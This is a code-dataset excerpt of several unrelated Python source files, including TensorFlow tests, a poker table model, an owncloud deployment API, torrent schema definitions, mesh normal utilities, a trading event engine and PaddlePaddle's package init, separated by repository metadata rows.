weights = self._Weights()
inp = self._Input()
m = self._BuildForward(weights, inp, mode)
loss = tf.reduce_sum(tf.square(m))
dw = tf.gradients([loss], [weights])
gdef = g.as_graph_def()
finish = time.time()
tf.logging.info("time: %f txt size: %d gdef bin size: %d", finish - start,
len(str(gdef)), len(gdef.SerializeToString()))
with g.as_default(), tf.Session(config=cfg) as sess:
return sess.run(dw)
d0 = RunForwardBackward("complete")
for cfg in _OptimizerOptions():
tf.logging.info("cfg = %s", cfg)
d1 = RunForwardBackward("cell", cfg)
d2 = RunForwardBackward("loop", cfg)
d3 = RunForwardBackward("loop10", cfg)
self.assertAllClose(d0, d1, rtol=1e-4)
self.assertAllClose(d0, d2, rtol=1e-4)
self.assertAllClose(d0, d3, rtol=1e-4)
class FunctionInlineControlTest(tf.test.TestCase):
def testFoo(self):
dtype = tf.float32
cfg = tf.ConfigProto(graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=True,
do_function_inlining=True,
do_constant_folding=True)))
for noinline in [False, True]:
@function.Defun(dtype, noinline=noinline)
def Cell(v):
# If v is a vector [n, 1], x is a big square matrix.
x = tf.tanh(v + tf.transpose(v, [1, 0]))
return tf.reduce_sum(x, 1, keep_dims=True)
@function.Defun(dtype)
def Forward(x):
for _ in range(10):
# pylint: disable=cell-var-from-loop
x = Cell(x)
return tf.reduce_sum(x, [0, 1])
self.assertEqual(noinline, Cell.definition.attr["_noinline"].b)
g = tf.Graph()
with g.as_default():
x = tf.placeholder(dtype)
y = Forward(x)
dx, = tf.gradients([y], [x])
np.random.seed(321)
inp = np.random.uniform(-1, 1, [16, 1]).astype(np.float32)
run_metadata = tf.RunMetadata()
with tf.Session(graph=g, config=cfg) as sess:
ans = sess.run(
[y, dx], {x: inp},
run_metadata=run_metadata,
options=tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE))
print(ans[0], np.sum(ans[1]))
self.assertAllClose(ans[0], 255.971, rtol=1e-3)
self.assertAllClose(np.sum(ans[1]), 13.0408, rtol=1e-3)
def MetadataHasCell(run_metadata):
for dev_stats in run_metadata.step_stats.dev_stats:
for node_stats in dev_stats.node_stats:
if "Cell" in node_stats.timeline_label:
return True
return False
self.assertEqual(MetadataHasCell(run_metadata), noinline)
@function.Defun(*[tf.float32] * 3)
def Linear(w, b, x):
return tf.nn.relu(tf.matmul(x, w) + b)
@function.Defun(*[tf.float32] * 5)
def Linear2(w1, b1, w2, b2, x):
return Linear(w2, b2, Linear(w1, b1, x))
class ModuleFunctionTest(tf.test.TestCase):
def testBasic(self):
with tf.Graph().as_default():
a, b, c, d, e = [tf.constant([[_]], dtype=tf.float32) for _ in range(5)]
y = Linear(a, b, c)
z = Linear2(a, b, c, d, e)
with tf.Session() as sess:
self.assertAllEqual([[1]], sess.run(y))
self.assertAllEqual([[5]], sess.run(z))
class VariableHoistingTest(tf.test.TestCase):
def _testSimpleModel(self, use_forward_func):
def _Model(x):
w = tf.get_variable(
"w", (64, 64), initializer=tf.random_uniform_initializer(seed=312))
b = tf.get_variable("b", (64), initializer=tf.zeros_initializer),
return tf.sigmoid(tf.matmul(x, w) + b)
@function.Defun()
def Model(x):
return _Model(x)
cvars = []
@function.Defun()
def Grad(x, y0):
if use_forward_func:
y = Model(x)
else:
y = _Model(x)
loss = tf.reduce_mean(tf.reduce_sum(y0 * tf.log(y), 1), 0)
arg_w, arg_b = function.get_extra_args()
self.assertEqual(arg_w.get_shape(), tf.TensorShape([64, 64]))
self.assertEqual(arg_b.get_shape(), tf.TensorShape([64]))
dw, db = tf.gradients(loss, [arg_w, arg_b])
cvars.extend(function.get_extra_vars())
return loss, dw, db
g = tf.Graph()
with g.as_default():
x = tf.random_normal([64, 64], seed=100)
y0 = tf.random_normal([64, 64], seed=200)
with tf.variable_scope("Foo"):
loss, dw, db = Grad(x, y0)
self.assertEqual(2, len(cvars))
w, b = cvars[:2]
self.assertEqual("Foo/w", w.op.name)
self.assertEqual("Foo/b", b.op.name)
with self.test_session(graph=g) as sess:
sess.run(tf.global_variables_initializer())
w, b, x, y0, loss, dw, db = sess.run([w, b, x, y0, loss, dw, db])
self.assertAllEqual(w.shape, (64, 64))
self.assertAllClose(np.sum(w), 2050.44)
self.assertAllEqual(b.shape, (64,))
self.assertAllClose(np.sum(b), 0.0)
self.assertAllClose(loss, -2.27, rtol=1e-2)
self.assertAllEqual(dw.shape, (64, 64))
self.assertAllClose(np.sum(dw), -1.04, rtol=1e-2)
self.assertAllEqual(db.shape, (64,))
self.assertAllClose(np.sum(db), 0.509, rtol=1e-2)
def testBasic(self):
self._testSimpleModel(True)
self._testSimpleModel(False)
if __name__ == "__main__":
tf.test.main()
| 29.928492 | 80 | 0.608004 |
178ed631f162a62ed2fc2c01c6e309f4d014545b | 3,019 | py | Python | backend/src/dealer/model/table.py | codepals-org/poker | 8b58df2ff4d3d9799c42652a9d6942d8ec6b3707 | [
"MIT"
] | 2 | 2020-11-07T16:37:14.000Z | 2020-11-07T17:11:24.000Z | backend/src/dealer/model/table.py | codepals-org/poker | 8b58df2ff4d3d9799c42652a9d6942d8ec6b3707 | [
"MIT"
] | 7 | 2020-11-07T14:04:06.000Z | 2020-11-11T11:49:13.000Z | backend/src/dealer/model/table.py | codepals-org/poker | 8b58df2ff4d3d9799c42652a9d6942d8ec6b3707 | [
"MIT"
] | 1 | 2020-11-08T13:00:27.000Z | 2020-11-08T13:00:27.000Z | from .player import Player, PlayerList
from typing import List
from enum import Enum, auto
import random
from typing import List
import logging
CARDS = [
# Card Abbreviations:
# https://commons.wikimedia.org/wiki/Category:SVG_playing_cards
"2H","3H","4H","5H","6H","7H","8H","9H","10H","JH","QH","KH","AH",
"2D","3D","4D","5D","6D","7D","8D","9D","10D","JD","QD","KD","AD",
"2S","3S","4S","5S","6S","7S","8S","9S","10S","JS","QS","KS","AS",
"2C","3C","4C","5C","6C","7C","8C","9C","10C","JC","QC","KC","AC"
]
class Phase(Enum):
REGISTRATION = auto() # Game has not started. Player able to take a seat.
PREFLOP = auto()
FLOP = auto()
TURN = auto()
RIVER = auto()
SHOWDOWN = auto()
class Table():
""" A Poker Table is where players can participate in a Poker Game """
def __init__(self, cash_per_player : float = 500,
small_blind :float = 10, big_blind :float = 20,
max_players :int = 8):
if max_players > 22:
raise ValueError("Maximum for a Poker Game is is 22 players.")
if max_players < 2:
raise ValueError("Minimum for a Poker Game is 2 players.")
self.cash_per_player :float = float(cash_per_player)
self.small_blind :float = float(small_blind)
self.big_blind :float = float(big_blind)
self.max_players :int = int(max_players)
self.phase :Phase = Phase.REGISTRATION
self.card_stack :List[str] = CARDS
random.shuffle(self.card_stack)
self.players = PlayerList(table=self)
self.community_cards :List[str] = []
def json(self):
return {
"id" : id(self),
"cash_per_player": self.cash_per_player,
"small_blind" : self.small_blind,
"big_blind" : self.big_blind,
"phase": self.phase
}
def signup(self, player :Player):
""" A player sits down at the table and gets the start budget"""
if self.phase != Phase.REGISTRATION:
raise RuntimeError("Game already started. No signups anymore.")
if len(self.players) >= self.max_players:
raise RuntimeError("Max players reached. No signups anymore.")
else:
self.players.append(player)
player.money_seat = self.cash_per_player
def start_game(self):
""" Start the game, hand out money to each player """
if self.phase != Phase.REGISTRATION:
raise RuntimeError("Game already started.")
if len(self.players) < 2:
raise RuntimeError("Not enough players to start the game.")
self.players.init_buttons()
self.players.deduct_blinds()
logging.warning(self.card_stack)
self.players.handout_cards(self.card_stack)
self.phase = Phase.PREFLOP
self.start_preflop()
def start_preflop(self):
self.players.who_starts().active = True
def call(self):
self.players.need_to_pay() | 35.104651 | 77 | 0.596555 |
336689372db2a2331924ca3fa154281a420cffb5 | 3,995 | py | Python | jumpscale/packages/owncloud/bottle/api.py | threefoldtech/owncloud_deployer | d652d54a35d7a964f5f1b50ffbec0855ffd6f02f | [
"Apache-2.0"
] | null | null | null | jumpscale/packages/owncloud/bottle/api.py | threefoldtech/owncloud_deployer | d652d54a35d7a964f5f1b50ffbec0855ffd6f02f | [
"Apache-2.0"
] | null | null | null | jumpscale/packages/owncloud/bottle/api.py | threefoldtech/owncloud_deployer | d652d54a35d7a964f5f1b50ffbec0855ffd6f02f | [
"Apache-2.0"
] | null | null | null | import csv
from jumpscale.loader import j
from jumpscale.packages.auth.bottle.auth import admin_only, get_user_info, login_required
from jumpscale.packages.owncloud.models.users import UserStatus
from jumpscale.packages.owncloud.models import deployment_model
from bottle import Bottle, request, HTTPResponse, static_file
app = Bottle()
templates_path = j.sals.fs.join_paths(j.sals.fs.dirname(__file__), "templates")
env = j.tools.jinja2.get_env(templates_path)
DEPLOYMENT_QUEUE = "DEPLOYMENT_QUEUE"
@app.route("/api/requests", method=["GET"])
@login_required
@admin_only
def list_users():
"""List all users for admin
"""
users = []
for user_name in deployment_model.list_all():
user = deployment_model.get(user_name)
users.append(user.to_dict())
return HTTPResponse(
j.data.serializers.json.dumps(users),
status=200,
headers={"Content-Type": "application/json"},
)
@app.route("/api/requests", method=["POST"])
@login_required
def create_user():
"""Create new instance for user if new
- return 409 if user has registered before
"""
user_info = j.data.serializers.json.loads(get_user_info())
username = j.data.text.removesuffix(user_info.get("username"), ".3bot")
data = j.data.serializers.json.loads(request.body.read())
email = data.get("email")
if email == "":
email = user_info.get("email")
if username in deployment_model.list_all():
return HTTPResponse(
f"user {username} has already submitted a request. please be patient while we prepare your deployment",
status=409,
headers={"Content-Type": "application/json"},
)
user = deployment_model.get(username)
user.tname = username
user.email = email
user.status = UserStatus.NEW
user.time = j.data.time.utcnow().timestamp
user.save()
return HTTPResponse(
f"Your request will be processed soon. You'll receive your deployment information at {user.email}",
status=201,
headers={"Content-Type": "application/json"},
)
@app.route("/api/deployment", method=["POST"])
@login_required
@admin_only
def deploy_instances():
"""get json file for approved users and generate terraform files for them
"""
users = j.data.serializers.json.loads(request.body.read())
for username in users:
user = deployment_model.get(username)
if user.status in [UserStatus.APPLY_FAILURE, UserStatus.NEW]:
user.status = UserStatus.PENDING
user.save()
j.core.db.rpush(DEPLOYMENT_QUEUE, j.data.serializers.json.dumps(username))
return HTTPResponse(
{"success": True},
status=200,
headers={"Content-Type": "application/json"},
)
@app.route("/api/balance", method=["GET"])
@login_required
@admin_only
def get_balance():
"""get the main wallet current balance
"""
balance = j.tools.http.get("http://localhost:3001/balance").json()
return HTTPResponse(
balance,
status=200,
headers={"Content-Type": "application/json"},
)
@app.route("/api/requests/export")
@login_required
@admin_only
def export():
"""Export saved users as csv
"""
users = []
for user_name in deployment_model.list_all():
order = deployment_model.get(user_name)
users.append(order.to_dict())
if not users:
return {"Error": "File not found"}
path = j.sals.fs.join_paths(j.core.dirs.BASEDIR, "exports")
j.sals.fs.mkdirs(path)
time_now = j.data.time.utcnow().strftime("%Y_%m_%d_%H_%M_%S")
filename = f"export_{time_now}.csv"
filepath = j.sals.fs.join_paths(path, filename)
keys = list(users[0].keys())
with open(filepath, "w", newline="") as csvfile:
writer = csv.writer(csvfile)
writer.writerow(keys)
for user in users:
writer.writerow(user[k] for k in keys)
return static_file(filename, root=path, download=filename)
| 30.730769 | 115 | 0.665081 |
67f36500657d7757009a2cbcee518899f03906bf | 2,440 | py | Python | clutch/schema/request/torrent/accessor.py | ExeArco/clutch | 223244b1294b496ba16c8a2433eb453cce593a62 | [
"MIT"
] | 34 | 2018-04-14T12:53:07.000Z | 2021-08-21T12:52:23.000Z | clutch/schema/request/torrent/accessor.py | ExeArco/clutch | 223244b1294b496ba16c8a2433eb453cce593a62 | [
"MIT"
] | 18 | 2018-04-30T20:32:44.000Z | 2021-10-03T15:24:33.000Z | clutch/schema/request/torrent/accessor.py | ExeArco/clutch | 223244b1294b496ba16c8a2433eb453cce593a62 | [
"MIT"
] | 10 | 2019-01-31T20:21:13.000Z | 2021-10-03T10:01:26.000Z | from typing import Optional, Set
from pydantic import BaseModel, Field, validator
from clutch.compat import Literal
from clutch.network.rpc.convert import to_hyphen, to_camel
from clutch.schema.user.method.shared import IdsArg
AccessorFieldRequest = Literal[
"activityDate",
"addedDate",
"bandwidthPriority",
"comment",
"corruptEver",
"creator",
"dateCreated",
"desiredAvailable",
"doneDate",
"downloadDir",
"downloadedEver",
"downloadLimit",
"downloadLimited",
"editDate",
"error",
"errorString",
"eta",
"etaIdle",
"files",
"fileStats",
"hashString",
"haveUnchecked",
"haveValid",
"honorsSessionLimits",
"id",
"isFinished",
"isPrivate",
"isStalled",
"labels",
"leftUntilDone",
"magnetLink",
"manualAnnounceTime",
"maxConnectedPeers",
"metadataPercentComplete",
"name",
"peer-limit",
"peers",
"peersConnected",
"peersFrom",
"peersGettingFromUs",
"peersSendingToUs",
"percentDone",
"pieces",
"pieceCount",
"pieceSize",
"priorities",
"queuePosition",
"rateDownload",
"rateUpload",
"recheckProgress",
"secondsDownloading",
"secondsSeeding",
"seedIdleLimit",
"seedIdleMode",
"seedRatioLimit",
"seedRatioMode",
"sizeWhenDone",
"startDate",
"status",
"trackers",
"trackerStats",
"totalSize",
"torrentFile",
"uploadedEver",
"uploadLimit",
"uploadLimited",
"uploadRatio",
"wanted",
"webseeds",
"webseedsSendingToUs",
]
TorrentAccessorFieldsRequest = Set[AccessorFieldRequest]
class TorrentAccessorArgumentsRequest(BaseModel):
ids: Optional[IdsArg]
format: Optional[Literal["objects", "table"]]
accessor_fields: TorrentAccessorFieldsRequest = Field(
..., alias="fields"
) # this must be an alias for pydantic reasons
@validator("accessor_fields", pre=True)
def accessor_fields_format(cls, v):
if v is not None:
hyphenated = ["peer_limit"]
result = []
try:
for field in v:
if field in hyphenated:
result.append(to_hyphen(field))
else:
result.append(to_camel(field))
except TypeError:
return v
return result
else:
return v
| 22.592593 | 58 | 0.597541 |
3e867f80d5a19232b064a8d79017691007f5df65 | 469 | py | Python | kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py | sobolevn/kubernetes-typed | 5f0a770631c73a9831fbeaeebac188e8f4a52c54 | [
"Apache-2.0"
] | 22 | 2020-12-10T13:06:02.000Z | 2022-02-13T21:58:15.000Z | kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py | sobolevn/kubernetes-typed | 5f0a770631c73a9831fbeaeebac188e8f4a52c54 | [
"Apache-2.0"
] | 4 | 2021-03-08T07:06:12.000Z | 2022-03-29T23:41:45.000Z | kubernetes_typed/client/models/apiextensions_v1beta1_webhook_client_config.py | sobolevn/kubernetes-typed | 5f0a770631c73a9831fbeaeebac188e8f4a52c54 | [
"Apache-2.0"
] | 2 | 2021-09-05T19:18:28.000Z | 2022-03-14T02:56:17.000Z | # Code generated by `typeddictgen`. DO NOT EDIT.
"""ApiextensionsV1beta1WebhookClientConfigDict generated type."""
from typing import TypedDict
from kubernetes_typed.client import ApiextensionsV1beta1ServiceReferenceDict
ApiextensionsV1beta1WebhookClientConfigDict = TypedDict(
"ApiextensionsV1beta1WebhookClientConfigDict",
{
"caBundle": str,
"service": ApiextensionsV1beta1ServiceReferenceDict,
"url": str,
},
total=False,
)
| 29.3125 | 76 | 0.763326 |
18aba273aabf87a58d4f4ee22cc8231a59082c8e | 9,199 | py | Python | tensorflow_graphics/geometry/representation/mesh/normals.py | drebain/graphics | c84b7599d1f8a55ccbdd589c1a845494c17c2784 | [
"Apache-2.0"
] | 1 | 2021-03-10T15:15:43.000Z | 2021-03-10T15:15:43.000Z | tensorflow_graphics/geometry/representation/mesh/normals.py | drebain/graphics | c84b7599d1f8a55ccbdd589c1a845494c17c2784 | [
"Apache-2.0"
] | null | null | null | tensorflow_graphics/geometry/representation/mesh/normals.py | drebain/graphics | c84b7599d1f8a55ccbdd589c1a845494c17c2784 | [
"Apache-2.0"
] | 1 | 2019-10-10T06:16:30.000Z | 2019-10-10T06:16:30.000Z | #Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tensorflow utility functions to compute normals on meshes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tensorflow_graphics.geometry.representation import triangle
from tensorflow_graphics.util import export_api
from tensorflow_graphics.util import safe_ops
from tensorflow_graphics.util import shape
def gather_faces(vertices, indices, name=None):
"""Gather corresponding vertices for each face.
Note:
In the following, A1 to An are optional batch dimensions.
Args:
vertices: A tensor of shape `[A1, ..., An, V, D]`, where `V` is the number
of vertices and `D` the dimensionality of each vertex. The rank of this
tensor should be at least 2.
indices: A tensor of shape `[A1, ..., An, F, M]`, where `F` is the number of
faces, and `M` is the number of vertices per face. The rank of this tensor
should be at least 2.
name: A name for this op. Defaults to "normals_gather_faces".
Returns:
A tensor of shape `[A1, ..., An, F, M, D]` containing the vertices of each
face.
Raises:
ValueError: If the shape of `vertices` or `indices` is not supported.
"""
with tf.compat.v1.name_scope(name, "normals_gather_faces",
[vertices, indices]):
vertices = tf.convert_to_tensor(value=vertices)
indices = tf.convert_to_tensor(value=indices)
shape.check_static(
tensor=vertices, tensor_name="vertices", has_rank_greater_than=1)
shape.check_static(
tensor=indices, tensor_name="indices", has_rank_greater_than=1)
shape.compare_batch_dimensions(
tensors=(vertices, indices),
last_axes=(-3, -3),
broadcast_compatible=False)
if hasattr(tf, "batch_gather"):
expanded_vertices = tf.expand_dims(vertices, axis=-3)
broadcasted_shape = tf.concat([tf.shape(input=indices)[:-1],
tf.shape(input=vertices)[-2:]],
axis=-1)
broadcasted_vertices = tf.broadcast_to(
expanded_vertices,
broadcasted_shape)
return tf.compat.v1.batch_gather(broadcasted_vertices, indices)
else:
return tf.gather(
vertices, indices, axis=-2, batch_dims=indices.shape.ndims - 2)
def face_normals(faces, clockwise=True, normalize=True, name=None):
"""Computes face normals for meshes.
This function supports planar convex polygon faces. Note that for
non-triangular faces, this function uses the first 3 vertices of each
face to calculate the face normal.
Note:
In the following, A1 to An are optional batch dimensions.
Args:
faces: A tensor of shape `[A1, ..., An, M, 3]`, which stores vertices
positions of each face, where M is the number of vertices of each face.
The rank of this tensor should be at least 2.
clockwise: Winding order to determine front-facing faces. The order of
vertices should be either clockwise or counterclockwise.
normalize: A `bool` defining whether output normals are normalized.
name: A name for this op. Defaults to "normals_face_normals".
Returns:
A tensor of shape `[A1, ..., An, 3]` containing the face normals.
Raises:
ValueError: If the shape of `vertices`, `faces` is not supported.
"""
with tf.compat.v1.name_scope(name, "normals_face_normals", [faces]):
faces = tf.convert_to_tensor(value=faces)
shape.check_static(
tensor=faces,
tensor_name="faces",
has_rank_greater_than=1,
has_dim_equals=(-1, 3),
has_dim_greater_than=(-2, 2))
vertices = tf.unstack(faces, axis=-2)
vertices = vertices[:3]
return triangle.normal(*vertices, clockwise=clockwise, normalize=normalize)
def vertex_normals(vertices, indices, clockwise=True, name=None):
"""Computes vertex normals from a mesh.
This function computes vertex normals as the weighted sum of the adjacent
face normals, where the weights correspond to the area of each face. This
function supports planar convex polygon faces. For non-triangular meshes,
this function converts them into triangular meshes to calculate vertex
normals.
Note:
In the following, A1 to An are optional batch dimensions.
Args:
vertices: A tensor of shape `[A1, ..., An, V, 3]`, where V is the number of
vertices.
indices: A tensor of shape `[A1, ..., An, F, M]`, where F is the number of
faces and M is the number of vertices per face.
clockwise: Winding order to determine front-facing faces. The order of
vertices should be either clockwise or counterclockwise.
name: A name for this op. Defaults to "normals_vertex_normals".
Returns:
A tensor of shape `[A1, ..., An, V, 3]` containing vertex normals. If
vertices and indices have different batch dimensions, this function
broadcasts them into the same batch dimensions and the output batch
dimensions are the broadcasted.
Raises:
ValueError: If the shape of `vertices`, `indices` is not supported.
"""
with tf.compat.v1.name_scope(name, "normals_vertex_normals",
[vertices, indices]):
vertices = tf.convert_to_tensor(value=vertices)
indices = tf.convert_to_tensor(value=indices)
shape.check_static(
tensor=vertices,
tensor_name="vertices",
has_rank_greater_than=1,
has_dim_equals=(-1, 3))
shape.check_static(
tensor=indices,
tensor_name="indices",
has_rank_greater_than=1,
has_dim_greater_than=(-1, 2))
shape.compare_batch_dimensions(
tensors=(vertices, indices),
last_axes=(-3, -3),
broadcast_compatible=True)
shape_indices = indices.shape.as_list()
if None in shape_indices[:-2]:
raise ValueError("'indices' must have specified batch dimensions.")
common_batch_dims = shape.get_broadcasted_shape(vertices.shape[:-2],
indices.shape[:-2])
vertices_repeat = [
common_batch_dims[x] // vertices.shape.as_list()[x]
for x in range(len(common_batch_dims))
]
indices_repeat = [
common_batch_dims[x] // shape_indices[x]
for x in range(len(common_batch_dims))
]
vertices = tf.tile(
vertices, vertices_repeat + [1, 1], name="vertices_broadcast")
indices = tf.tile(
indices, indices_repeat + [1, 1], name="indices_broadcast")
# Triangulate non-triangular faces.
if shape_indices[-1] > 3:
triangle_indices = []
for i in range(1, shape_indices[-1] - 1):
triangle_indices.append(
tf.concat((indices[..., 0:1], indices[..., i:i + 2]), axis=-1))
indices = tf.concat(triangle_indices, axis=-2)
shape_indices = indices.shape.as_list()
face_vertices = gather_faces(vertices, indices)
# Use unnormalized face normals to scale normals by area.
mesh_face_normals = face_normals(
face_vertices, clockwise=clockwise, normalize=False)
if vertices.shape.ndims > 2:
outer_indices = np.meshgrid(
*[np.arange(i) for i in shape_indices[:-2]],
sparse=False,
indexing="ij")
outer_indices = [np.expand_dims(i, axis=-1) for i in outer_indices]
outer_indices = np.concatenate(outer_indices, axis=-1)
outer_indices = np.expand_dims(outer_indices, axis=-2)
outer_indices = tf.constant(outer_indices, dtype=tf.int32)
outer_indices = tf.tile(outer_indices, [1] * len(shape_indices[:-2]) +
[tf.shape(input=indices)[-2]] + [1])
unnormalized_vertex_normals = tf.zeros_like(vertices)
for i in range(shape_indices[-1]):
scatter_indices = tf.concat([outer_indices, indices[..., i:i + 1]],
axis=-1)
unnormalized_vertex_normals = tf.compat.v1.tensor_scatter_add(
unnormalized_vertex_normals, scatter_indices, mesh_face_normals)
else:
unnormalized_vertex_normals = tf.zeros_like(vertices)
for i in range(shape_indices[-1]):
unnormalized_vertex_normals = tf.compat.v1.tensor_scatter_add(
unnormalized_vertex_normals, indices[..., i:i + 1],
mesh_face_normals)
vector_norms = tf.sqrt(
tf.reduce_sum(
input_tensor=unnormalized_vertex_normals**2, axis=-1,
keepdims=True))
return safe_ops.safe_unsigned_div(unnormalized_vertex_normals, vector_norms)
# API contains all public functions and classes.
__all__ = export_api.get_functions_and_classes()
| 39.144681 | 80 | 0.678769 |
13fd212eb7923e35a380b483a671761992aaef1b | 4,090 | py | Python | helix/engines.py | phantomii/helix | 88a7270f20554943fa2cb22e1432d0f653ba9ae7 | [
"Apache-2.0"
] | null | null | null | helix/engines.py | phantomii/helix | 88a7270f20554943fa2cb22e1432d0f653ba9ae7 | [
"Apache-2.0"
] | null | null | null | helix/engines.py | phantomii/helix | 88a7270f20554943fa2cb22e1432d0f653ba9ae7 | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2016-2017 Eugene Frolov <eugene@frolov.net.ru>
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
import threading
import time
import six
from helix.dm import events
from helix.events import base
class OnStartEngine(base.Event):
pass
class OnStopEngine(base.Event):
pass
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class AbstractGroupOfInstruments(object):
def __init__(self, instruments):
super(AbstractGroupOfInstruments, self).__init__()
self._instruments = instruments
def get_current_timestamp(self):
return time.time()
@abc.abstractmethod
def on_loop(self):
raise NotImplementedError()
def __iter__(self):
return iter(self._instruments)
class GroupOfHistoricalInstruments(AbstractGroupOfInstruments):
def _select_instrument(self):
target_instrument = None
next_tick_time = float("inf")
for instrument in self._instruments:
if instrument.get_next_tick_info().timestamp < next_tick_time:
target_instrument = instrument
return target_instrument
def get_current_timestamp(self):
target_instrument = self._select_instrument()
return target_instrument.get_next_tick_info().timestamp
def on_loop(self):
target_instrument = self._select_instrument()
target_instrument.on_loop()
class EventEngine(threading.Thread):
"""Event engine
parameters:
:param event_bus: - Instance of helix.events.Eventbus class
:param instruments: - Instance of AbstractGroupOfInstruments child
"""
def __init__(self, event_bus, instruments):
super(EventEngine, self).__init__()
self._event_bus = event_bus
self._market_timestamp = 0
self._instruments = instruments
self._set_market_timestamp(instruments.get_current_timestamp())
self._idle_timeout = 10
self._event_bus.subscribe(OnStopEngine, self._stop_event_handler)
self._event_bus.subscribe(events.OnTickEvent,
self._set_market_timestamp_handler)
self._stop = False
def get_ide_timeout(self):
return self._idle_timeout
def set_idle_timeout(self, timeout):
self._idle_timeout = timeout
def get_market_timestamp(self):
return self._market_timestamp
def _set_market_timestamp(self, timestamp):
if self._market_timestamp < timestamp:
self._market_timestamp = timestamp
def _set_market_timestamp_handler(self, event):
self._set_market_timestamp(event.get_tick().timestamp)
def get_instruments(self):
return self._instruments
def get_instrument(self, name):
for instrument in self._instruments:
if instrument.name == name:
return instrument
raise ValueError("Instrument %s not found" % name)
def get_event_bus(self):
return self._event_bus
def run(self):
self._event_bus.fire(OnStartEngine())
while not self._stop:
# get new tick events
self._instruments.on_loop()
if self._event_bus.is_empty():
time.sleep(self._idle_timeout)
self._event_bus.process_events()
LOG.info("Engine stopped")
def _stop_event_handler(self, event):
self._stop = True
def stop(self):
self._event_bus.fire(OnStopEngine())
| 28.013699 | 78 | 0.685575 |
02725751cb6694a774cd224c53a0bea6b8dc680b | 12,739 | py | Python | python/paddle/__init__.py | Joejiong/Paddle | 6d6ea569dc1e9ff15fdc774c79276b0f79444f5e | [
"Apache-2.0"
] | 1 | 2021-02-08T02:09:19.000Z | 2021-02-08T02:09:19.000Z | python/paddle/__init__.py | Joejiong/Paddle | 6d6ea569dc1e9ff15fdc774c79276b0f79444f5e | [
"Apache-2.0"
] | 1 | 2020-09-22T08:54:49.000Z | 2020-09-22T11:44:09.000Z | python/paddle/__init__.py | Joejiong/Paddle | 6d6ea569dc1e9ff15fdc774c79276b0f79444f5e | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
try:
from paddle.version import full_version as __version__
from paddle.version import commit as __git_commit__
except ImportError:
import sys
sys.stderr.write('''Warning with import paddle: you should not
import paddle from the source directory; please install paddlepaddle*.whl firstly.'''
)
import paddle.batch
batch = batch.batch
from .fluid import monkey_patch_variable
from .fluid.dygraph import monkey_patch_math_varbase
monkey_patch_variable()
monkey_patch_math_varbase()
import paddle.framework
from .framework import VarBase as Tensor
import paddle.compat
import paddle.distributed
import paddle.sysconfig
import paddle.tensor
import paddle.distribution
import paddle.nn
import paddle.distributed.fleet
import paddle.optimizer
import paddle.metric
import paddle.device
import paddle.regularizer
import paddle.incubate
import paddle.autograd
# TODO: define alias in tensor and framework directory
from .tensor.random import randperm
from .tensor.random import bernoulli
from .tensor.attribute import rank #DEFINE_ALIAS
from .tensor.attribute import shape #DEFINE_ALIAS
from .tensor.attribute import real #DEFINE_ALIAS
from .tensor.attribute import imag #DEFINE_ALIAS
from .tensor.creation import to_tensor #DEFINE_ALIAS
from .tensor.creation import diag #DEFINE_ALIAS
from .tensor.creation import eye #DEFINE_ALIAS
# from .tensor.creation import fill_constant #DEFINE_ALIAS
# from .tensor.creation import get_tensor_from_selected_rows #DEFINE_ALIAS
from .tensor.creation import linspace #DEFINE_ALIAS
from .tensor.creation import ones #DEFINE_ALIAS
from .tensor.creation import ones_like #DEFINE_ALIAS
from .tensor.creation import zeros #DEFINE_ALIAS
from .tensor.creation import zeros_like #DEFINE_ALIAS
from .tensor.creation import arange #DEFINE_ALIAS
from .tensor.creation import eye #DEFINE_ALIAS
from .tensor.creation import full #DEFINE_ALIAS
from .tensor.creation import full_like #DEFINE_ALIAS
from .tensor.creation import triu #DEFINE_ALIAS
from .tensor.creation import tril #DEFINE_ALIAS
from .tensor.creation import meshgrid #DEFINE_ALIAS
from .tensor.creation import empty #DEFINE_ALIAS
from .tensor.creation import empty_like #DEFINE_ALIAS
from .tensor.creation import assign #DEFINE_ALIAS
from .tensor.linalg import matmul #DEFINE_ALIAS
from .tensor.linalg import dot #DEFINE_ALIAS
# from .tensor.linalg import einsum #DEFINE_ALIAS
from .tensor.linalg import norm #DEFINE_ALIAS
from .tensor.linalg import transpose #DEFINE_ALIAS
from .tensor.linalg import dist #DEFINE_ALIAS
from .tensor.linalg import t #DEFINE_ALIAS
from .tensor.linalg import cross #DEFINE_ALIAS
from .tensor.linalg import cholesky #DEFINE_ALIAS
# from .tensor.linalg import tensordot #DEFINE_ALIAS
from .tensor.linalg import bmm #DEFINE_ALIAS
from .tensor.linalg import histogram #DEFINE_ALIAS
from .tensor.linalg import mv #DEFINE_ALIAS
from .tensor.logic import equal #DEFINE_ALIAS
